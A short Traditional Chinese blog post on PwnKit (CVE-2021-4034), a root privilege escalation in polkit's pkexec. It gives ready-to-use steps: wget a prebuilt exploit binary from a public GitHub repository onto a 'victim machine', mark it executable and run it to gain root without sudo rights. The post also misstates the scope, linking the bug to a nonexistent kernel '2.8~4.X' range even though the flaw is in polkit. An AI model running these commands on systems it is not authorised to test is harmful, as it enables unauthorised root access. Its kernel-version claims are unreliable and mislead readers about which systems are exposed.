一項被隱藏12年的Linux漏洞PwnKit，能讓攻擊者取得幾乎所有Linux平台伺服器上的root權限。原稱為PolicyKit的Polkit是用以管理源自Unix的OS的系統權限，讓非特殊權限的行程可和特殊權限的行程安全通訊，也讓使用者利用名為pkexec的元件下達特殊權限的指令。

安全廠商於去年11發現PwnKit，而在主要Linux發行版修補完成後，於本周公佈。本項漏洞編號CVE-2021-4034，CVSS 3.0風險值7.8。2009 後的版本就內建此安全性問題

只要linux kernal版本介於2.8~4.X之間的都可以這樣提權，所以包含了

• ubuntu 11.10到18.10等版本
• Fedora 16~29版本
• Redhat 7-8

，且縱使你的使用者沒有sudo root的權限也可以使用，因為他就是直接切換成root帳號去了

你可以在github ly4k/PwnKit 這邊找到相關的檔案及介紹

操作方法如下

#先下載檔案，你也可以先抓好在傳過去你的受害機
wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
chmod +x PwnKit
./PwnKit

我會改用wget的原因是，部分系統沒有內建curl 還要另外再安裝(他不是內建的)，上面可以看到我先sudo過會提示目前這個帳號是沒有root的權限的，當我下載完pwnkit執行完畢後，就拿到root權限了